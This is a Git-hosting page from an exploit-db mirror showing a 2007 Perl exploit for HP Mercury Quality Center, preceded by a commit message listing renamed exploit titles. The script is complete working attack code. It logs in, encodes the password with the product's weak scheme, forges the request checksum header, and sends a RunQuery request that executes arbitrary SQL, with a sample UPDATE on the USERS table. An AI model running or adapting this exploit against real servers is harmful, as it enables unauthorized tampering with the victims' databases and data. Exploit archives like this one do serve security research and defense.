bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/remote/3654.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

165 lines
5.3 KiB
Prolog
Executable file
Raw Blame History

#!/usr/bin/perl
#******************************************************************
# HP Mercury Quality Center runQuery exploit.
# Run whatever SQL you want on there db - without SQL injection.
# Problem is client can do "RunQuery" command os we write program
# to do this. Client can lots other things it should not also!
# The backend database can be MSSQLServer or Oracle or nearly often
# MSDE. This changes SQL types you can send. This is a blind SQL
# attack but may be is it possible to get data out somehow?
#
# Copyright 2007 Isma Khan - Code may be freedly usuable on other
# exploits as long as name appears.
# ******************************************************************
use IO::Socket;
my $sql = "UPDATE USERS SET US_ADDRESS='0wned' WHERE US_USERNAME='paul_qc'";
#my $sql = "UPDATE USERS SET US_ADDRESS='0wned' WHERE US_USERNAME='isma-khan'";
# victim - Put yur victims hostname here.
# vicport - Port to connect on.
# u - username to login to quality center. This user provided.
# p - Psswrd to login ot quality center. Try default passwords.
# domain - A domain thhat user has access to.
# project - A proj that user has access to.
my $victim = '192.168.0.2';
my $vicport = 8080;
my $u = 'alex_qc';
my $p= '';
my $domain = 'DEFAULT';
my $project = 'QualityCenter_Demo';
# ****** Login to HPQMC *******************
print "Login\n";
my @bits;
push @bits, AddString('Login');
push @bits, "\"0:int:1\"";
push @bits, "\"0:int:-1\"";
push @bits, "\"0:int:-1\"";
push @bits, AddString("{\r\nUSER_NAME:$u,\r\nPASSWORD:" . SmolkaEncript($p) . ",\r\nCLIENTTYPE:\\00000018\\Quality Center Client UI\r\n}\r\n");
my $tmphost="0:conststr:Bannu";
push @bits, "\\" . MakeHex($tmphost) . "\\" . $tmphost;
push @bits, "\"65536:str:0\"";
push @bits, "\"0:pint:0\"";
push @bits, "\"0:pint:0\"";
push @bits, "\"0:pint:0\"";
my $res=HTTPSending(@bits);
undef @bits;
my ($sesid) = $res =~ /ID:(\d+)/;
die "Not login\n" unless($sesid);
print "Session ID: $sesid\n";
# ***** Connect to project *********
print "Connect to project\n";
push @bits, AddString('ConnectProject');
push @bits, "\"0:int:2\"";
push @bits, "\"0:int:$sesid\"";
push @bits, "\"0:int:-1\"";
push @bits, AddString("{\r\nDOMAIN_NAME:$domain,\r\nPROJECT_NAME:\\" . MakeHex($project) . "\\$project\r\n}\r\n");
push @bits, "\"65536:str:0\"";
push @bits, "\"0:pint:0\"";
$res = HTTPSending(@bits);
undef @bits;
my ($psesid) = $res =~ /ID:(\d+)/;
die "Not project\n" unless($psesid);
print "Project Session ID: $psesid\n";
# ******** Run the SQL *****
print "Run SQL\n";
push @bits, AddString('RunQuery');
push @bits, "\"0:int:3\"";
push @bits, "\"0:int:$sesid\"";
push @bits, "\"0:int:$psesid\"";
push @bits, AddString($sql);
push @bits, "\"65536:str:0\"";
push @bits, "\"0:int:0\"";
$res = HTTPSending(@bits);
print $res;
# **** Expect to get Failed to Run Query[ERR_SEP]Messages:
# error here but SQL like INSERT or UPDATE still work.
#******************************************************************
# Make password
#******************************************************************
sub SmolkaEncript {
my $password=shift;
return '' unless($password);
my $cripted='ENRCRYPTED';
my $base = 'SmolkaWasHereMonSher';
my $x=0;
for(;$x<length($password);$x++){
$cripted = $cripted . (ord(substr($password,$x,1))+ord(substr($base,$x,1)));
$cripted = $cripted . '!';
}
return $cripted;
}
# ************************************************************
# Send a text as HTTP to victim.
# ***********************************************************
sub HTTPSending {
my $body = bits2string(@_);
my $sock = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$victim,PeerPort=>$vicport)
or die "Can't connect. $!\n";
my $header = "POST /qcbin/servlet/tdservlet/TDAPI_GeneralWebTreatment HTTP/1.0\r\n"
. "Content-Type: text/html; charset=UTF-8\r\n"
. "X-TD-ID: " . sprintf("%08X",XTDID($body)). "\r\n"
. "User-Agent: TeamSoft WinInet Component\r\n"
. "Content-Length: " . length($body) . "\r\n"
. "Pragma: no-cache\r\n"
. "\r\n";
print $sock $header;
print $sock $body;
my $text;
while(!eof($sock)){
$text .= <$sock>;
}
return $text;
}
# ********* HPMQCs conststr type *********
sub AddString {
my $str = shift;
if (length($str)<16){
return "\"0:conststr:$str\"";
} else {
return '\\' . MakeHex("0:conststr:$str") . "\\0:conststr:$str";
}
}
# ********HPMQC uses hex digits in many place ************
sub MakeHex {
return sprintf("%08x",length(shift));
}
# ********************************************************
# This takes @bits and make big longer string out of it.
# *******************************************************
sub bits2string {
my @bits=@_;
my $bitno = 0;
my $retstr="{\r\n";
foreach my $onebit (@bits){
$retstr .= $bitno++ . ": $onebit,\r\n";
}
$retstr = substr($retstr,0,-3);
$retstr = $retstr . "\r\n}\r\n";
return $retstr;
}
# *************************************************
# HPMQC useid X-TD-ID header which is sum of all chars
# in body plus number 2301. Could checksum?
# **********************************************
sub XTDID {
my $total=2301;
my $body = shift;
for(my $i=0;$i<length($body);$i++){
$total += ord(substr($body,$i,1));
}
return $total;
}
# milw0rm.com [2007-04-03]
Reference in a new issue View git blame Copy permalink